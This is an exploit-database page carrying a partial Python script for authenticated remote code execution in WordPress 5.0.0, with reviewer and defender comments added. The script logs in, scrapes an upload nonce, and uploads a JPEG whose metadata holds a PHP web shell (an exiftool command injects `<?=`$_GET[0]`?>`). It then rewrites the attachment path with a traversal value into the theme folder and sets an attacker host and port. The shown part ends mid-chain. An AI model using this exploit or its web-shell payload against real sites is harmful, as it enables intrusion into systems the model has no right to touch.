Exploits / Vulnerability Discovered : 2021-02-01 |
Type : webapps |
Platform : php
This exploit for the WordPress 5.0.0 image remote code execution vulnerability is for educational purposes only; if you use it, you do so at your own risk!
# NOTE(review): username, password, url, wp_theme and the requests / re /
# datetime imports are used below but defined in a part of the file that is
# not visible here; nothing in this span verifies them.
lhost = '10.10.10.10' #attacker ip
lport = '4141' #listening port
# NOTE(review): lhost and lport are not referenced anywhere in the lines shown here.
# 'YYYY/MM/' prefix taken from the local clock of the machine running this
# script; it assumes the target's upload folder for this month matches -- TODO confirm.
date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/'
imagename = 'gd.jpg'
# ======
# Note :
# ======
# It could be any jpg image, BUT there are some modifications first :
# 1- image name as : "gd.jpg"
# 2- place the image in the same directory as this exploit.
# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>"
#
# Defender's view: every step below runs with a valid WordPress account that is
# allowed to upload media, so the chain is post-authentication. Strong
# credentials/MFA for upload-capable roles and a patched WordPress core (the
# page targets 5.0.0; confirm the fixed release against the upstream changelog)
# remove its precondition.

# --- Step 1: log in with the supplied credentials --------------------------
data = {
    'log':username,
    'pwd':password,
    'wp-submit':'Log In',
    'redirect_to':url+'wp-admin/',
    'testcookie':1
}
r = requests.post(url+'wp-login.php',data=data)
# NOTE(review): an HTTP 200 is presumably not proof that authentication
# succeeded (a re-rendered login form is also a 200), so this branch can
# report success for a failed login -- verify against the response body.
if r.status_code == 200:
    print("[+] Login successful.\n")
else:
    print("[-] Failed to login.")
    # NOTE(review): every failure path in this span calls exit(0), so a
    # caller cannot distinguish failure from success by the exit status.
    exit(0)
cookies = r.cookies

# --- Step 2: fetch the media-upload page and scrape its _wpnonce ------------
print("[+] Getting Wp Nonce ... ")
res = requests.get(url+'wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
    print("[-] Failed to retrieve the _wpnonce \n")
    exit(0)
else :
    wp_nonce = wp_nonce_list[0]
    print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n")

# --- Step 3: upload the prepared image through the async uploader ----------
print("[+] Uploading the image ... ")
data = {
    'name': 'gd.jpg',
    'action': 'upload-attachment',
    '_wpnonce': wp_nonce
}
# NOTE(review): the file handle opened here is never closed (no with-block
# and no close()); it is released only when the interpreter exits.
image = {'async-upload': (imagename, open(imagename, 'rb'))}
r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies)
if r_upload.status_code == 200:
    # NOTE(review): both [0] indexes raise IndexError rather than reaching the
    # friendly message below when the response does not match these patterns.
    image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
    _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
    print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n")
else :
    print("[-] Failed to receive a response for uploaded image ! try again . \n")
    exit(0)

# --- Step 4: rewrite the attachment's stored file path ---------------------
print("[+] Changing the path ... ")
data = {
    '_wpnonce':_wp_nonce,
    'action':'editpost',
    'post_ID':image_id,
    # Path-traversal value written into the _wp_attached_file post meta: the
    # '?/../../' sequence pointing out of the uploads tree into
    # themes/<wp_theme>/ is the indicator. Detection: attachment meta values
    # containing '../', or editpost requests to wp-admin/post.php that carry
    # meta_input[_wp_attached_file]. Mitigation: a patched WordPress core.
    'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali'
}
res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
if res.status_code == 200:
    print("[+] Path has been changed successfully. \n")
else :
    print("[-] Failed to change the path ! Make sure the theme is correcte .\n")
    exit(0)
# NOTE(review): the script continues in the part of the file not shown here.